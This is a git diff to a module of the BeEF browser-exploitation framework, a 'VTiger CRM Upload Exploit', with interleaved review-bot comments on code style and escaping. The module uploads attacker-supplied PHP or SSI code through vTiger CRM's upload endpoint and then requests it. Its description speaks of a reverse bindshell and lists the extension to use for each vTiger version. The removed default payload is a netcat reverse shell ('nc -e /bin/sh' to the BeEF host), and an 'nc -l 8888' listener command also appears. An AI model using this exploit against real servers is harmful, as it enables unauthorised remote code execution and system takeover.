diff --git a/modules/network/vtiger_crm_upload_exploit/command.js b/modules/network/vtiger_crm_upload_exploit/command.js
index 236865722..3cad71a87 100644
--- a/modules/network/vtiger_crm_upload_exploit/command.js
+++ b/modules/network/vtiger_crm_upload_exploit/command.js
@@ -26,6 +26,22 @@ beef.execute(function() {
baseurl = "<%= @vtiger_url %>";
+ function get_ajax() {
+ var http_request;
+ // use the ActiveX control for IE5.x and IE6
+ try {
+ http_request = new ActiveXObject("MSXML2.XMLHTTP");
+ } catch (othermicrosoft){
+ try {
+ http_request = new ActiveXObject("Microsoft.XMLHTTP");
+ } catch (native) {
+ // If IE7, Mozilla, Safari, etc: Use native object
+ http_request = new XMLHttpRequest();
+ }
+ }
+ return http_request;
+ }
+
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
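Review bot: `get_ajax` is a local reimplementation of the helper the module obtained until now from `beef.net.get_ajax()` (the calls replaced in `ajax_upload` and `do_callfile`), and nothing in the hunk records why the shared helper is bypassed, so a later maintainer is likely to fold it back. Add a header comment above the function stating the reason, e.g. `// Local copy of beef.net.get_ajax: <REASON> — keep in sync with the shared helper`. The catch parameter `native` was a future reserved word in ES3, which some of the legacy engines this ActiveX fallback chain exists for may reject at parse time; naming it `nativeErr` sidesteps the question. The enclosing `beef.execute(function() { ... })` callback starts and ends outside the hunk.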
@@ -40,8 +56,11 @@ beef.execute(function() {
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
- http_request = false;
- http_request = beef.net.get_ajax();
+ var http_request;
+
+ http_request = false;
+ http_request = get_ajax();
+
if (!http_request) {
// fail silently!
return false;
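Review bot: The added `http_request = false;` is dead, since the very next line overwrites it with `http_request = get_ajax();`; `var http_request = get_ajax();` expresses the same thing in one line, and the same pattern reappears in `do_callfile` (the later hunk of this file). Note also that `get_ajax` never yields a falsy value — its final `new XMLHttpRequest()` either succeeds or throws — so the `if (!http_request)` guard below cannot fire, and a constructor exception escapes the setTimeout callback instead of failing silently as the comment intends; either correct the comment or have the helper return `false` on that failure. The rest of `ajax_upload` lies outside the hunk.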
@@ -77,18 +96,16 @@ beef.execute(function() {
+ '\r\n'
+ boundary
+ '\r\n'
- + 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\r\n'
+ + 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
- + '<\?php' + '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
- + '\?>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
- + 'vtiger-fun.PHP'
+ + '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
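Review bot: The new `<%= @mal_filename %>.<%= @mal_ext %>` expansions, like the existing `<%= @vtiger_php %>` one a few lines above, are spliced raw into a single-quoted JavaScript string literal, so a value containing `'`, `\` or a line break turns the whole rendered script into a syntax error, and the only thing guarding against that is a UI label in module.rb. Escape the values for a JS literal at render time, or at least document the contract at the first expansion, e.g. `// NOTE: template values are inserted raw into this literal; they must not contain ', \ or newlines`. The multipart body expression begins before the hunk and the statement continues after it.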
@@ -137,14 +154,14 @@ beef.execute(function() {
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
- do_callfile(0,1000);
+ do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
- function do_callfile(start,count){
+ function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
@@ -152,13 +169,13 @@ beef.execute(function() {
for (i=start;i<=start+count;i++)
{
var http_request = false;
- http_request = beef.net.get_ajax();
+ http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
- var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_vtiger-fun.PHP";
+ var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
diff --git a/modules/network/vtiger_crm_upload_exploit/config.yaml b/modules/network/vtiger_crm_upload_exploit/config.yaml
index 5d1d01a51..4dbe58bc9 100644
--- a/modules/network/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/network/vtiger_crm_upload_exploit/config.yaml
@@ -5,6 +5,6 @@ beef:
category: "Network"
name: "VTiger CRM Upload Exploit"
description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
- authors: ["wade", "bm", "pipes", "xntrik"]
+ authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
target:
working: ["ALL"]
diff --git a/modules/network/vtiger_crm_upload_exploit/module.rb b/modules/network/vtiger_crm_upload_exploit/module.rb
index 5dc7aa7e0..b61ca5902 100644
--- a/modules/network/vtiger_crm_upload_exploit/module.rb
+++ b/modules/network/vtiger_crm_upload_exploit/module.rb
@@ -15,14 +15,16 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
super({
'Name' => 'VTiger CRM Upload Exploit',
- 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888',
+ 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888.
vTigerCRM 5.0.4: Use extension "PHP" and php code.
vTigerCRM 5.2.0: Use extension "phtml" and php code.
vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
'Category' => 'Network',
- 'Author' => ['wade', 'bm', 'pipes', 'xntrik'],
+ 'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
'Data' =>
[
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
- {'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'},
+ {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
+ {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
+ {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
],
'File' => __FILE__
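Review bot: The `ui_label` `'Injected PHP (must escape single quotes)'` is out of step with the Description added in the same hunk, which also lists SSI code for vTigerCRM 5.2.1; a label such as `'Injected code (PHP or SSI; escape single quotes)'` keeps the two consistent. Delegating the quoting rule to the operator through a label is also fragile: judging from the command.js hunks, an unescaped quote or a line break in this field breaks the generated script rather than producing a validation error, so if the template cannot escape at render time, record the rule in a comment beside the field as well. The `super({ ... })` call and the class continue outside the hunk.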